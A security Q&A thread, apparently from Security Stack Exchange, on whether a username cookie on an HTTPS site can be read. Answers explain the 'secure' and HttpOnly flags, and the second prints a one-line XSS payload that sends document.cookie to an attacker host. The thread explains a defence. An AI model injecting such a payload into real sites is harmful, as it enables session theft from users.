# Can we read HTTP cookie value?

Tags: http, cookies, header

In one of the applications I'm testing, the cookie contains the username (`set:cookie: username`) in the HTTP header. Is it possible to read these cookie values using any methods? The site uses HTTPS.

Comment: Personally, I'd be much more interested in the effect of _changing_ this cookie and sending it back to the server.

Answer (score 2):

Generally, reading cookies by other sites or by a man-in-the-middle attacker is not possible, if the site is configured correctly.

Cookies are not strictly bound to the same-origin policy. Depending on their settings, they may be shared with subdomains and superdomains. If cookies settings are not marked as `secure`, cookies set over HTTPS are also sent over HTTP. So, if your cookie is on `https://test.example.com`, a man-in-the-middle attacker could create `http://fake.test.example.com` and read the cookie.

Answer (score 0):

Given the fact that you are posting this question on security.stackexchange.com, I assume that you're interested in the security implications of *"Is it possible to read these cookie values using any methods?"*.

In addition to what Sjoerd correctly states, it's worth mentioning that in case that the *httponly* flag has *not* been set on the cookie, a potential attacker could use XSS or similar techniques to inject javascript into a HTTP response and read your cookies by use of a `document.cookie` method call. XSS attack code may look like:

```
<script>var i=new Image;i.src="http://attackersite.com:1337/?"+document.cookie;</script>
```

See also (https://owasp.org/www-community/HttpOnly)